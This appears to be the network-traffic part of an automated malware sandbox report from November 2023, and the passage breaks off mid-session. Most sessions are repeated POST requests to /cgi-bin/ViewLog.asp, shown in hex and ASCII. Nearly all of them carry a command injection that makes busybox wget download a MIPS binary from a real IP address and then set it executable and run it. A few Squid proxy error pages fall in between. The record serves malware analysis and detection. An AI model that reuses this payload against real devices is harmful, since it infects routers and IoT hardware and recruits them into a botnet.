                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:22.570748091 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:15:22 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              88192.168.2.1439806120.53.4.9623
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:22.511836052 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 35 3a 30 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:15:05Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              89192.168.2.144353831.33.10.2518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:22.744731903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.272216082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:24.328181028 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              90192.168.2.144381231.136.213.988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:22.757006884 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.336297035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:24.488177061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:26.984075069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:31.591922045 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.807569027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.238831997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:36.101270914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              91192.168.2.145527294.102.129.2148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:22.761395931 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.752227068 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:24.904153109 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:27.240087032 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:31.847923994 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.063565016 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:01.286705017 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:38.149089098 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              92192.168.2.145587494.242.230.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.504745007 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.910558939 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
